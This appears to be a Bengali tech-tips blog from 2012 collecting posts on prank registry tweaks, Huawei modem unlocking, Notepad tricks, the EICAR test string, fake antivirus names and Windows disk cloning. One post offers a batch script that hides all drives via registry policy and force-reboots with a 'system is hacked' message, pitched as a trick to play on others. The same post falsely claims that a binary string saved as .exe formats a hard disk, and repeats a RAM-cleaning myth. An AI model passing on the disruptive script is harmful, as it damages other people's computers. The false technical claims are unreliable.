আসসালামু আলাইকুম

সোমবার, ১৬ এপ্রিল, ২০১২

বন্ধুর পিসির right click ডিসাবল করে দিয়ে চমক দেখিয়ে দিন

ভাই কেমন আছেন? জি আপনাকে বলছি? আপনিকি বন্ধুর সাথে একটু ফাজলামি করতে আগ্রহি আছেন? তাহলে ঠিক পোস্ট খুলেছেন। এখানেই পাবেন এমন ফাইজলামি ট্রিকস :p তবে এটি একদিক থেকে আপনাকে রক্ষা করতে পারে। কেউ চাইলে আপনার কম্পিউটার এর থিম, কালার বা অন্য কিছু পরিবর্তন করতে পারবে না যদি আপনি এই সিস্টেম টি চালু করে রাখুন। আজকে আমরা দেখে নিব কিভাবে ডেক্সটপ থেকে মাউস এর রাইট ক্লিক ডিসাবল মানে অচল মানে রাইট ক্লিক বন্ধ করে দিতে পারবেন আপনি।

১) Start button থেকে run এ গিয়ে টাইপ করুন regedit তারপরে Enter চাপুন।

২। এবার এখানে যাবেন

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

৩। এবার সাইড প্যানেল এ ক্লিক করে নতুন DWORD যুক্ত করে নাম দিন NoViewContextMenu এবং value data বক্স এর মাঝে ভেলু দিন 1

৪) এবার পিসি রিস্টার্ট দিন।

৫) পুনরায় রাইট ক্লিক এনাবল করতে আগের মত সেই জায়গায় গিয়ে শুধু NoViewContextMenu ডিলিট করে দিন। তারপরে পিসি রিস্টার্ট দিলেই মাউসের রাইট ক্লিক আবার চালু হয়ে যাবে।

***যেকোন মডেমের আনলক কোড জানার ট্রিকস*****


সবাইকে শুভেচ্ছা। বর্তমানে আমরা যেসব মডেম ব্যবহার করি, যেমন: গ্রামীন, বাংলালিংক ইত্যাদির সাধারন হুয়াই মডেম হয়ে থাকে। আগে এগুলোতে সহজ ট্রিকসের মাধ্যমে এক কোম্পানীর মডেম এ সকল সিম ব্যবহার করা যেত। কিন্তু এখন তারা একটু চালাক হয়েছে। তারা একটু জটিল পদ্ধতি ব্যবহার করছে। কিন্তু পাবলিক তার থেকেও বেশি ট্রিকস ব্যবহার করে সব সিমই ব্যবহার করছে। আমরা যারা জানি না তাদের জন্যই আমার এই লিখা।

প্রখমে আপনি এই সফটওয়্যার টা ডাউনলোড করুন। Huawei Unlocker.rar

খুব কম কিলোবাইটের একটি সফটওয়ার এটি। ডাউনলোড হয়ে গেলে ইন্সটল দিন। ডাবল ক্লিক করলেই ইন্সটল হবার কথা। কোন এরর মেসেজ দেখালে continue তে ক্লিক করুন। এইরকম একটি উইন্ডো আসবে।

HUAWAI MODEM UNLOCK CODE

এখন connection এর বাম পাশে Huawei ট্যাবে ক্লিক করুন। এইরকম একটা উইন্ড্রো আসবে।

HUAWAI MODEM UNLOCK CODE



নিচের imei এর ঘরে আপনি আপনার Huawei মডেমটার পিছন থেকে এর imei নং টা দেখে বসান। ঠিকভাবে বসাবেন।

এরপর calculate code বাটনে ক্লিক করুন। ছবির মত আপনি একটি করে আনলক কোড ও ফ্লাস কোড পাবেন। যেমন ছবিতে

আনলক কোড: 54247945 এবং

ফ্লাস কোড : 34630784
HUAWAI MODEM UNLOCK CODE

আপনি যখন আপনার মডেমে অন্যকোন ব্রান্ডের সিম লাগালে আনলক কোড চাবে তথন এই আনলক কোড দিয়ে দিবেন। তো হয়ে গেল আনলক কোড জানার ট্রিকস। এভাবে আপনি আপনার হুয়াই মডেমে যেকোন জি এস এম সিম ব্যবহার করতে পারবেন।

শুক্রবার, ১৩ এপ্রিল, ২০১২

Notepad এর কিছু Exclusive Tips.(না দেখলে অনেক কিছু Miss করবেন)

কেমন আছেন সবাই সবাই?আশা করি ভাল আছেন।আজ আপনাদের জন্য যে টিউনটি করব সেটি আপনাদের অনেক কাজে লাগবে কিন্তু কারো ক্ষতি করবেন না।

নোটপ্যাড ব্যবহার করে Hard disk drive ফরমেট করুন।
প্রথমে Notepad Open করে নিচের কোডটি লিখুন:
01001011000111110010010101010101010000011111100000
এবার এটিকে Format your HDD.exe বা আপনার ইচ্ছামত নাম ব্যবহার করতে পারেন কিন্তু অবশ্যই .exe এক্সটেনশনে save করতে হবে।এবার এটিকে রান করালে আপনার Hard disk drive format হয়ে যাবে।

Hard disk Disable করুন নোটপ্যাড ব্যবহার করে।
প্রথমে Notepad Open করে নিচের কোডটি লিখুন:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \”Sorry Your System is hacked by us!\” -f
এবার একে Disable hard disk.bat নামে সেভ করুন।এই ফাইলটি রান করালে আপনার Computer এর Hard disk disable হয়ে যাবে।

নোটপ্যাডের মাধ্যমে RAM Clean করে আপনার কম্পিউটারের স্পিড বাড়ান।
আমাদের Computer এ যখন অনেক প্রোগ্রাম একসাথে তখন আমাদের কম্পিউটার বেশ Slow কাজ করে।এর প্রধান কারন হল RAM.কারন,যখন অনেক প্রোগ্রাম একসাথে চলে তখন RAM Full হয়ে যায়।এ অবস্থায় আমরা RAM কিছুটা Clean করে Computer এর Speed বাড়াতে পারি।সুতরাং আমাদেরকে যা করতে হবে তাহল,নোটপ্যাড ওপেন করে নিচের Command টি লিখতে হবে:
FreeMem=Space(64000000)
এবার একে যেকোন ফাইল নেম দিয়ে .vbs ফাইল হিসেবে সেভ করুন।এবার ফাইলটিকে রান করালে কিছুটা RAM Clean হবে এবং আপনার Computer টি দ্রুত কাজ করবে।
এছাড়াও আপনি যদি আরও মেমরি ক্লিন করতে চান তবে নিচের Command গুলো দেখুন:
FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb
লক্ষ্য রাখবেন আপনার Command কৃত মেমরি RAM এর মেমরি থেকে বেশি না হয়।ধন্যবাদ।

how to format a pendrive using command prompt

1) (skip the format, just unhide them)

Open a dos prompt (Start >> Run >> cmd) and type:
attrib -r -h -s ./s x:\*.*
This will change the attributes of all of the files on the pen drive. Readonly, hidden, and system attributes will be removed. Replace the X: with your pen drive's drive letter. Now you will be able to see them in Explorer, and delete them, without formatting anything.

2) (format with DOS commands)

Open the DOS prompt (Start >> Run >> cmd)
Type:
FORMAT X: /FS:FAT32 /Q /V:PenDrive
This will reformat the Pen drive, using the FAT32 file system, and label the drive PenDrive. Replace X: with the actual drive letter of your Pen Drive. For more help on this command, type:
FORMAT /?
at the command prompt.


3) (format using Windows GUI, Explorer)

Open Explorer, go to My Computer, right click on the drive letter and select Format... from the popup menu. Pen drives are usually formatted with the FAT32 file system, but if you're of a mind, you can also use NTFS. But keep in mind, if you use NTFS you won't be able to take the pen drive out, without a reboot.

How to Format a Virus Infected Pen drive Using Command Prompt

This simple format trick allows you to to format a virus infected pen drive using command prompt in windows. There may be certain occasions where you cant format you pendrive by right clicking and select format. Because simply the virus script inside the pendrive do not allow such things. If you try to delete the virus file .exe like autorun.exe itself, it may return immediately because the virus program is a tricky one.

However most of the time, a pen drive format using cmd will delete the virus file permanently by means. So here's the steps to format a pendrive using command prompt window.



First, insert your thum drive into the usb port
Open my computer and find out the drive specification letter for your usb drive. For example, in my case it's H:



Open command prompt ( start>>Run = "cmd" without quotes )



Type format"your drive letter" and press Enter twice | in my case,

C:\Documents and Settings\Tomin>format h:

Now the command prompt setup will verify the file system and ask you to enter a name for your drive - Volume label



After giving a volume label, press Enter



You're now done.

বুধবার, ১১ এপ্রিল, ২০১২

আমার মত যারা ভুলো মনা তাদের জন্য অসম্ভব স্পিডি একটি ডেক্সটপ সার্চিং সফটওয়্যার। কম্পিউটারের ফাইল খুজতে এর জুড়ি নেই। আর যারা উইন্ডোজের ডিফল্ট সার্চিং এর লোডিং ………. দেখতে দেখতে রীতিমত বিরক্ত তারা নির্ধিদ্বায় ডাউনলোড করতে পারেন। একদম সাদামাটা ইন্টারফেস আর নিমিষেই সাচিং রেজাল্ট সমৃদ্ধ।সর্বোপরি অবশ্যই ফ্রি সফটওয়্যার।


চলুন এক নজরে দেখে নেই এর ফিচার গুলো

–> খুবই ছোট ইন্সটলার সাইজ (মাত্র 344KB)।

–> সাদামাটা ইউজার ইন্টারফেস।

–> দ্রুত ইনডেক্সিং (কম্পিউটার স্লো করে না)

–> অত্যন্ত দ্রুত গতির সার্চিং রেজাল্ট (ইন্সট্যান্ট সার্চিং রেজাল্ট)

–> রিয়েলটাইম আপডেটিং

–> র‌্যাম ইউজ করে খুবই কম

আর দেরী নয় ডাউনলোড করুন এখান থেকে

আপনি জানেন কি আপনার antivirus টা কি কাজ করছে কি না?

কেমন আছেন সবাই। আজকে একটা অন্য রকম পোস্ট সবার সাথে শেয়ার করবো। মনে হয় অনেক-ই জানেন,তারপরও কিছু নতুন এবং ভিন্ন ভাবে আমি এই পোস্ট টা সবার সামনে উপস্থাপন করলাম।

আপনি জানেন কি আপনার অ্যান্টিভাইরাস টা কি কাজ করছে কি না ?

তাহলে এখন আমরা কথা এখন কাজের কথায় যাবো , প্রথমে আপনার সিস্টেম থেকে নোট ওপেন করেন >>>>>>>

এখন নোট প্যাড ওপেন করে ,নিচের লিখা টা হুবুহু কপি করে নোট প্যাডে পেস্ট করেনঃ >>>>>>>


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

এখন সেভ করার সময় নাম দিবেনঃ save as > test.com

এখন এটা ওপেন করার সাথে সাথে যদি এটা ডিলেট হয়ে যায়,তাহলে মনে করবেন আপনার অ্যান্টিভাইরাস টা ঠিক মতো কাজ করছে ।যদি ডিলেট না হয় ,তাহলে মনে করবেন

সাথে দেখে নিন কিছু ফেক অ্যান্টিভাইরাস এর লিস্টঃ

PC Security 2011

ThinkPoint

ThinkSmart

Antivirus 8

Security Tool

My Security Shield

Antivirus 7

Antivirus GT

Defense Center

Protection Center

Sysinternals Antivirus

Security Master AV

CleanUp Antivirus

Security Toolbar

Digital Protection

XP Smart Security 2010

Antivirus Suite

Vista Security Tool 2010

Total XP Security

Security Central

Security Antivirus

Total PC Defender 2010

Vista Antivirus Pro 2010

Your PC Protector

Vista Internet Security 2010

XP Guardian

Vista Guardian 2010

Antivirus Soft

XP Internet Security 2010

Antivir 2010

Live PC Care

Malware Defense

Internet Security 2010

Desktop Defender 2010

Antivirus Live

Personal Security

Cyber Security

Alpha Antivirus

Windows Enterprise Suite

Security Center

Control Center

Braviax

Windows Police Pro

Antivirus Pro 2010

PC Antispyware 2010

FraudTool.MalwareProtector.d

Winshield2009.com

Green AV

Windows Protection Suite

Total Security 2009

Windows System Suite

Antivirus BEST

System Security

Personal Antivirus

System Security 2009

Malware Doctor

Antivirus System Pro

WinPC Defender

Anti-Virus-1

Spyware Guard 2008

System Guard 2009

Antivirus 2009

Antivirus 2010

Antivirus Pro 2009

Antivirus 360

MS Antispyware 2009

IGuardPC or I Guard PC

Additional Guard

এই সব অ্যান্টিভাইরাস গুলো ভুলেও পিসি তে ইন্সটল করবেন না ,তাহলে আপনার উইন্ডোজ এর প্রবলেম হবে । চিনে রাখুন ।

রবিবার, ৮ এপ্রিল, ২০১২

Media fire এ resume support করুন খুব সহজে। (নতুন পদ্ধতি)

আজকে আমি আপনাদের সাথে শেয়ার করবো কিভাবে অতি সহজে আমরা media fire থেকে resume সাপোর্ট করে ফাইল ডাউনলোড করতে পারি। আমি এখন আপনাদেরকে একটি ছোট সফটওয়্যার শেয়ার করবো। সফটওয়্যারটার সাইজ হচ্ছে মাত্র ৯৬০ কেবি। এই সফটওয়্যার দিয়ে আপনি media fire এর ফাইল ডাউনলোড করলে। সারা জীবন resume সাপোর্ট করে রাখতে পারবেন। সফটওয়্যারটি ডাউনলোড করতে নিচের লিঙ্ক এ ক্লিক করেন।

http://www.mediafire.com/?6z17sn82rs8818c


ডাউনলোড শেষ হলে আপনি এই সফটওয়্যার তা ওপেন করুন। লিঙ্ক (Direct link downloader)এর ঘরে mediafire এর লিঙ্ক তা paste করুন।

Like: (http://www.mediafire.com/?6z17sn82rs8818c)

এরপর ডাউনলোড এ ক্লিক করুন। ৩ সেকেন্ড অপেক্ষা করুন তারপর ডাউনলোড Automatic স্টার্ট হয়ে যাবে আপনার INTERNET DOWNLOAD MANAGER এ।



Now Enjoy with Premium Download from Mediafire.com



পোস্টটি ভালো লাগলে কমেন্টস করবেন।

Windows 8 এ .NET framework 3.5 কিভাবে ডাউনলোড না করে এনাবল করবেন?!

.NET framework উইন্ডোজ এ সফটওয়্যার চালানোর জন্য অনেক গুরুত্বপূর্ণ। অনেক সফটওয়্যার চলবেই না; কিন্তু দুঃখের বিষয় by default এটা ডিসেবল থাকে। এটা না থাকলে কোনও সফটওয়্যার রান করতে গেলে হয়তো নিচের ছবির মত একটা মেসেজ আসে:::

এটা enable করতে হলে আগে আপনাকে control panel থেকে programs and features এ যেতে হবে।। এটা মোটামুটি বড় ফাইল, ডাউনলোড করতে অনেক কষ্ট।

আবার উপরের ছবির প্রথম অপশন এ টিক দিয়ে ওকে করলে অনেকে এই Error 0x800f0906 এররটা পায়। আবার এখন ডাউনলোড করতে গেলে আপনাকে ২৯১ মেগা ডাউনলোড করতে হবে যা লিমিটেড ইউসারদের জন্য কষ্টকর।।



Windows 8 Consumer Preview তে কিভাবে কোনও কিছু ডাউনলোড ছাড়া আপনি এটা enable করবেন, তা দেখাবো, অন্য কোনটাতে এই ট্রিক আমি অ্যাপ্লাই করিনি।



Step 01► .iso ফাইলটা কম্প্রেশন/ ডিকম্প্রেশন সফটওয়্যার যেমন 7-zip দিয়ে ওপেন করে Sources ফোল্ডার ওপেন করুন ও sxs ফোল্ডার খুঁজে বের করুন।। এবার এটা এখানে কপি করুন >>

C:\ Temp

Step 02► এবার এডমিনিস্ট্রেটর হিসেবে কমান্ড প্রম্পট রান করে নিচেরটুকু টাইপ করে এন্টার দিন:::
dism.exe /online /enable-feature /featurename:NetFX3 /All /Source:c:\temp\sxs /LimitAccess

কাজ শেষ, এবার রিবুট করুন দেখেন যে ২য় ছবির প্রথম অপশন এ টিক দেয়া!!

এবার তাহলে মনমত সফটওয়্যার চালান যেমন Autocad!! ২৯১ মেগা বেঁচে গেলো!!

বার বার windows সেটআপ এবং software ইন্সটল করা বাদ দিয়ে পুরনো সমস্ত সফটওয়্যার সহ উইন্ডোজ কপি করে ফেলুন

উইন্ডোজ ইন্সটল করার ঝামেলা আর কতদিন তাই না? আর কত? তাই এবার মজার জিনিস নিয়ে এসেছি সবার জন্য। ১০০% কাজে লাগবেই। বার বার আর উইন্ডোজ ইন্সটল করতে হবে না আপনার। সাধারণত উইন্ডোজ সেটআপ দিলে পুরনো সফটওয়্যার গুলো আবার নতুন করে ইন্সটল করতে হয় তাই না? কিন্তু উইন্ডোজ ৭ এর মাঝে এমন একটি সুবিধা আছে যা দিয়ে আপনাকে পুরনো সফটওয়্যার গুলো আর নতুন করে ইন্সটল করতে হবে না এবং উইন্ডোজ ও সেটআপ দিতে হবে না।



কেনো করবেন?

মনে করেন কোন কারনে আপনার হার্ড ডিস্ক এর সি ড্রাইভ ক্রেশ করে ফেলেছে তখন আপনার পুরনো সমস্ত সফটওয়্যার মুছে যাবে। তাছারা নানান কারনে আমাদের উইন্ডোজ সেটআপ দিতে হয়। এই সিস্টেম এর সাহায্যে আপনাকে বার বার উইন্ডোজ সেটআপ দিতে হবে না। আবার মজার কথা হল একবার এটি বানিয়ে রাখলে আপনি যে কোন কম্পিউটার এ এটি হুবুহু কপি করতে পারবেন।

কিভাবে এটি কাজ করে?

সিস্টেম টি আসলে খুব সহজ এটি আসলে একটি হার্ড ডিস্ক থেকে আরেকটি হার্ড ডিস্ক এর মাঝে সি ড্রাইভের সমস্ত ডাটা কপি করে। সি ড্রাইভের সমস্ত কিছু একটি হার্ড ডিস্ক থেকে আরেকটি হার্ড ডিস্ক এর মাঝে কপি করে ফেলে। অনেক দোকানে এভাবেই একটি মাস্টার হার্ড ডিস্ক বানিয়ে রাখে পরে এক্তির পরে একটি কম্পিউটার এর মাঝে শুধু কপি করতে থাকে। এতে অনেক বেশি সময় কম লাগে যদি কমান্ড গুলো একবার মুখস্থ করে ফেলতে পারেন।

কি কি লাগবে?

এদ্ভান্স লেভেল এর নলেজ লাগবে। যে কমান্ড প্রমট এ আগে কাজ করেছেন।

কাজটি করতে আপনার ২টি এইচডিডি লাগবে । কিছু করার নাই কষ্ট করতে না চাইলে ২তা হার্ড ডিস্ক মানেজ করতেই হবে।

আরেকজনের পিসিতে সেটআপ দিতে চাইলে হার্ডওয়্যার এক রকম হতে হবে।

শুরু করুনঃ-
১। প্রথমে একটি এক্সট্রা হার্ড ডিস্কে পিসি নতুন করে সেটআপ করুন সাধারণ ভাবে। আপনার পিসিতে সমস্ত কিছু সুন্দর ভাবে ইন্সটল করে নিন। যা যা সফটওয়্যার আপনার লাগে। এন্টি ভাইরাস লাগিয়ে স্কেন করে নিন।এই হার্ড ডিস্ক টি ছোট হতে পারবে তবে এটি সব সময় আলাদা করে সেভ করে রাখবেন। এটাই মাস্টার ডিস্ক হবে আমাদের। প্রতিবার এখান থেকে আমরা সব কিছু কপি করে নিব।

২। এখন আপনার রেগুলার হার্ড ডিস্ক যুক্ত করে উইন্ডোজ ৭ এর সিডি প্রবেশ করিয়ে পিসি রিস্টার্ট মারেন।

৩। এবার “Repair your computer” দিন।

৪। তারপরে SHIFT+F10 চাপুন কমান্ড লাইন আসার জন্য।

৫। টাইপ করুন DISKPART আপনার নতুন মানে রেগুলার হার্ড ডিস্ক এর মাঝে primary partition তৈরি করতে।

diskpart

list disk

select disk 1

create partition primary size=30000

list partition

select partition 0

format fs=ntfs quick

active
৬। diskpart এর মাঝে আপনার মাস্টার / পুরনো হার্ড ডিস্ক সিলেক্ট করুন এবং আপনার পুরনো হার্ড ডিস্ক টি assign করুন non-C ড্রাইভ হিসাবে যেমন হতে পারে H, J, K

select disk 0

list partition

select partition 0

assign letter=H:
7. DISKPART এর মাঝে সেই partition তা সিলেক্ট করুন যেটি আপনি ৫নং স্টেপ এর মাঝে করেছেন। এবং এটিকে assign করুন ড্রাইভ C: হিসাবে।

৮। diskpart বের হয়ে যান। DIR command ব্যবহার করে দেখে নিন ড্রাইভ লেটার চেঞ্জ হয়েছে নাকি।

DIR C:

DIR H:
৯ এবার নিচের কমান্ড দিয়ে পুরনো হার্ড ডিস্ক এর সিস্টেম গুলো কপি করে নিন হার্ড ডিস্ক এর মাঝে।

robocopy h:\ c:\ /mir /copy:datso /r:2 /w:2 /zb /np /tee /log:rbcp.log
১০। boot sector তৈরি করুন নিজের কমান্ড দিয়ে।

bootsect /nt60 C:
১১। পিসি shutdown করে মাস্টার হার্ড ডিস্ক মানে পুরনো হার্ড ডিস্ক খুলে ফেলুন এবং আবার পিসি চালু করে দিন। বাস কাজ শেষ এবার দেখুন নতুন হার্ড ডিস্ক এর মাঝে পুরনো সমস্ত সফটওয়্যার সহ উইন্ডোজ সেটআপ হয়ে গেছে।

১২। যদি সিস্টেম আপনাকে পিসি repair করতে বলে তাহলে জাস্ট windows 7 installation সিডি প্রবেশ করে repair করুন automatically

১৩। সরি নতুন বন্ধুদের কাজটা অনেক কঠিন মনে হতে পারে। এর থেকেও সহজ উপায় আছে আরেকটা সময় পেলেই লিখতে বসে যাবো।

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More